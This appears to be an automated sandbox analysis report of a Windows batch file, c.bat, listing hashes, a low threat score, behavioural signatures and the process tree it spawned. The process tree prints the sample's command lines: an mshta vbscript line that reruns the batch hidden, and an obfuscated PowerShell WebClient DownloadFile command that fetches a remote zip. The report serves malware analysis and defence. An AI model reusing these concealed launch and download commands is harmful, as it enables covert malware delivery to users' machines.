Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    11-11-2024 19:05

General

  • Target

    c.bat

  • Size

    228KB

  • MD5

    a3b38f1fb45a0d979bb36e9b75d2f87d

  • SHA1

    39bbb23feb2ca23f3c4086b60e87a9bdc8dd061a

  • SHA256

    d6700b00f076df721138d454547343a20467a731a76f0f8602f676cb9485bec5

  • SHA512

    4ec8b722e1f12e3c29cde328bf4d4e399410c44097379944b0e5f2aca48ed59973cdfe53664da1de5201fbf630660550fb44f7832ab3e19f93717d366cdd4e99

  • SSDEEP

    3072:Q4nDlXCJFOY9/dyPKgMGfGiPovhfpla1R1EYkOipIUqntjj9YjMybguqJb5HIPv9:1Wb9IPjuplaP1Vgr0nSYJmBN5

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\c.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\system32\chcp.com
      chcp 65001
      2⤵
        PID:2100
      • C:\Windows\system32\mshta.exe
        mshta vbscript:createobject("wscript.shell").run("""C:\Users\Admin\AppData\Local\Temp\c.bat"" ::",0)(window.close)
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" ::"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2856
          • C:\Windows\system32\chcp.com
            chcp 65001
            4⤵
              PID:2228
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo [Net.ServicePointManager]::SecurityProtocol = [N~24, 1%e%HKsXQ]?uCWUi%D1%H?XlOr%p%b?y?X[B%n%s#nxkc$%f%MAj$d%c%cQlFxw%t%_qvjkk%e%pKX(QH%j%llFbrz%A1%doSOt%c%,CMfQO%z%$crX$mf%e%(Euwih$%z%?X(So%n%cN$mP%z%#icen%w%XwZFESA%E1%XOi[OOd%j%$Eyjj%a%IM,C?e#%p%cUvEw#CNtvXiT,rwRwpEJBU%E1%?asUA%w%fxVzu%d%fWHS?Tz::2; (New-Object -TypeName System.Net.WebClient).DownloadFile('https~1, 1Bb?gw[rmtq%v%vogdc]%w%j][]zCA%t%TgrYf#%y%lyqEnrR%r%TT??TaD%o%$jdRQM%z%(lyMmPD%h%)aKqa%l%uFBjMfH%t%jBHRRoNcSXo%n%NDSMQ_P%z%gXNaGK%x%Np_FOSjwFCn%g%yFr[Lg%t%WHfBLeD%p%RwCkA%e%ztWyIf%y%mZhCP%l%RtHq$dq%x%hfuMUht%a%?mXdoAm%w%TsZRd%f%m#(XnjE%r%lRNSXeADLj%k%ofkK[d%t%O]yT,t%a%)pvut#QcxHX(#lTh#uEyso%D1%mK$CZ%j%CowxrQ[%d%[]QT_%e%SETlC%p%DpU?Wi%x%)tRBzJFeAv)%T1%aGzwD%Z1%luJUdMa$sbnuS%A1%UgtfKH_%l%,NlMzpP%e%Lvn)gU%s%WWZ#oteyyp_Jm_BZZhZgi(FC%R1%cZPomFt%p%#B,cW%e%d]h$wjp%E1%k[dbx_,%p%Q_i[?%x%kUZ(Jk%Temp:~-16, 1%A1%wuCDaah%l%m#vzk(V%e%x$daWR%s%x]$qiQArCxhz$RguiEtw$Wgnvv#tW%i%P(T_t%Q1%mrzYVRM%D1%qG,(GO%Z1%nrTYL%u%KELqdEl1Q.zip') "
              4⤵
                PID:2140
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2772

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2772-5-0x000000001B680000-0x000000001B962000-memory.dmp

          Filesize

          2.9MB

        • memory/2772-6-0x0000000001F40000-0x0000000001F48000-memory.dmp

          Filesize

          32KB